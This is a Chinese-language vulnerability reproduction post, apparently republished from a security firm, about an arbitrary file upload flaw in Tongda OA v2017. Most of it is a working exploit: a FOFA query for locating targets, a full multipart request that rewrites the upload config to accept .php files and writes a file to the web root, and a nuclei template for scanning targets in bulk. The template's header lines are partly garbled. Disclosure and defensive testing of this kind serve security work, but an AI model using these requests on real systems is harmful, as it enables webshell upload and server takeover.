0x01 漏洞描述
通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达存在任意文件上传漏洞,攻击者可以通过指定接口上传任意文件,获取服务器管理权限。
0x02 漏洞复现
fofa:"通达-OA"
1.上传eee.php文件至网站根目录,内容为0xold6
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Go-http-client/1.1
Content-Length: 880
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
eee
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
0xold6
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"
submit
-----------------------------55719851240137822763221368724--
2.访问eee.php,成功上传文件
GET /eee.php HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=vm1hud5b14spa0ulldoa63njt2; KEY_RANDOMDATA=2342
Upgrade-Insecure-Requests: 1
3.编写nuclei脚本
nuclei命令(-u可改为-l批量验证):
nuclei.exe -t tongdaOA_Action_upload.yaml -u http://x.x.x.x
脚本:
id: tongdaOA_Action_upload
info:
name: TongdaOA Action_upload
author: sm
severity: critical
tags: TongdaOA
requests:
raw:
|
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
Go-http-client/1.1 :
880 :
multipart/form-data; boundary=---------------------------55719851240137822763221368724 :
X_requested_with: XMLHttpRequest
gzip :
-----------------------------55719851240137822763221368724
form-data; name="CONFIG[fileFieldName]" :
ffff
-----------------------------55719851240137822763221368724
form-data; name="CONFIG[fileMaxSize]" :
1000000000
-----------------------------55719851240137822763221368724
form-data; name="CONFIG[filePathFormat]" :
eee
-----------------------------55719851240137822763221368724
form-data; name="CONFIG[fileAllowFiles][]" :
.php
-----------------------------55719851240137822763221368724
form-data; name="ffff"; filename="test.php" :
application/octet-stream :
0xold6
-----------------------------55719851240137822763221368724
form-data; name="mufile" :
submit
-----------------------------55719851240137822763221368724--
|
GET /eee.php HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate :
DNT: 1
Connection: close
Cookie: PHPSESSID=vm1hud5b14spa0ulldoa63njt2; KEY_RANDOMDATA=2342
1 :
matchers:
type: word
words:
"0xold6"
part: body
(注:本文章为技术分享,禁止任何非授权攻击行为)
网络安全神兵利器分享
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):漏洞复现 通达OA v2017 Action_upload任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论